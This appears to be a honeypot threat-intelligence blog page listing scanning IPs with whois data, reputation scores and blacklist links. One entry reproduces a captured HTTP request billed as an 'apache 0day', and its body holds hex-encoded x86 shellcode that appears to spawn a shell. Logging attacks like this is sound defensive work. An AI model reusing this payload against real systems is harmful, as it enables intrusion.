  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 5.7
  • Reference: https://exchange.xforce.ibmcloud.com/ip/5.28.182.161
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/5.28.182.161
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

93.174.93[.]203

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 93.174.93.203
  • BGP Prefix : 93.174.88.0/21
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-06-20
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/93.174.93.203
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/93.174.93.203

118.98.104.21 - Morfeus Fucking Scanner

118.98.104[.]21

    Whois Data (TeamCymru)
  • AS : 17974
  • IP : 118.98.104.21
  • BGP Prefix : 118.98.104.0/24
  • CC : ID
  • Registry : apnic
  • Allocated : 2007-08-24
  • AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/118.98.104.21
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

77.126.12.73 - masscan/1.0

77.126.12[.]73

    Whois Data (TeamCymru)
  • AS : 9116
  • IP : 77.126.12.73
  • BGP Prefix : 77.126.0.0/20
  • CC : IL
  • Registry : ripencc
  • Allocated : 2006-11-07
  • AS Name: GOLDENLINES-ASN 012 Smile Communications Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 5.7
  • Reference: https://exchange.xforce.ibmcloud.com/ip/77.126.12.73
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/77.126.12.73

Freitag, 1. Januar 2016

185.130.5.224 - apache 0day by @hxmonsegur [Update1 - 05/01/2016]

BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/&#736%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*

31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c95 1516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031
c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0
b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd
8031c0b001cd80

 END OF DATA

185.130.5[.]224

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.224
  • BGP Prefix : 185.130.5.0/24
  • CC : LThttps://www.blogger.com/blogger.g?blogID=7778406999173736079#editor/target=post;postID=5908088170526748213
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.224

UPDATE:
The vulnerability (if it exists and is not just a marketing idea to push twitter follower) is not reflected by any entry in exploit-db.com or 0day.today

UPDATE 2: (Thanks to@DanielRufde)

 https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0